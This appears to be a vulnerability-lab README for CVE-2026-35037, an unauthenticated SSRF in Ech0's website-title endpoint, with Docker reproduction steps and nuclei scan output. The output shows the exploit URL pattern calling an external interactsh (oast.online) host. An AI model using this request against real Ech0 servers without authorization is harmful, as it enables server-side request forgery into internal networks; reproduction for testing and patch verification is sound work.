## https://sploitus.com/exploit?id=A76BD209-FD8C-579D-8C51-957EF08DE9B7
# CVE-2026-35037 Ech0 SSRF Lab
This repository contains a local, isolated reproduction lab for `CVE-2026-35037`, an unauthenticated SSRF vulnerability in Ech0's `GET /api/website/title` endpoint.
The lab uses a controlled local evidence server instead of cloud metadata or third-party infrastructure.
## Summary
- Product: `lin-snow/Ech0`
- Vulnerability: Server-Side Request Forgery
- CVE: `CVE-2026-35037`
- GHSA: `GHSA-cqgf-f4x7-g6wc`
- Affected versions: GHSA lists ``
- `nuclei/CVE-2026-35037.yaml`: nuclei template candidate
## Why Build From Source?
Historical vulnerable Docker tags such as `sn0wl1n/ech0:4.2.1` were not available when this lab was created. The lab builds from the official `lin-snow/Ech0` GitHub tags instead:
- `v4.2.1` for the vulnerable candidate
- `v4.2.8` for the patched comparison
The local Dockerfile also avoids upstream build issues observed with the historical `build.Dockerfile`.
## Requirements
- Docker Engine or Docker Desktop
- `curl`
- Optional: `nuclei`
Run this only in a local isolated lab. Do not use these commands against third-party systems. Use only against systems you own or have explicit written authorization to test.
## Reproduce Vulnerable Behavior
Start Ech0 `v4.2.1`:
```bash
ECH0_TAG=4.2.1 docker compose up -d --build
```
Send the controlled verification request:
```bash
sh verify-cve-2026-35037.sh
```
Expected vulnerable response:
```http
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
{"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}
```
Confirm that Ech0 reached the controlled evidence server:
```bash
docker compose logs evidence
```
Observed evidence log:
```text
ech0-cve-2026-35037-evidence | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -
```
## Compare Patched Version
Start Ech0 `v4.2.8`:
```bash
docker compose down -v
ECH0_TAG=4.2.8 docker compose up -d --build
```
Run the same request:
```bash
sh verify-cve-2026-35037.sh
```
Observed patched response:
```http
HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8
{"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}
```
## Nuclei Validation
Validate the template:
```bash
nuclei -validate -t nuclei/CVE-2026-35037.yaml
```
Run against vulnerable `v4.2.1`:
```bash
nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
```
Observed vulnerable result:
```text
[INF] Using Interactsh Server: oast.online
[CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
[INF] Scan completed in 6.425886625s. 1 matches found.
```
Run against patched `v4.2.8`:
```bash
nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
```
Observed patched result:
```text
[INF] Using Interactsh Server: oast.fun
[INF] Scan completed in 5.974574416s. No results found.
```
## Cleanup
```bash
docker compose down -v
```
## Notes
- The manual lab uses `http://evidence:8080/` inside the Docker Compose network.
- The nuclei template uses `{{interactsh-url}}` and requires OAST/interactsh support.
- The nuclei template uses `{{interactsh-url}}`, which contacts ProjectDiscovery's interactsh servers such as `oast.online` or `oast.fun` by default. Use `-iserver` to override the server or `-ni` to disable interactsh.
- The lab does not probe cloud metadata endpoints.
- The lab does not contact production or third-party targets except normal dependency/image downloads during Docker build.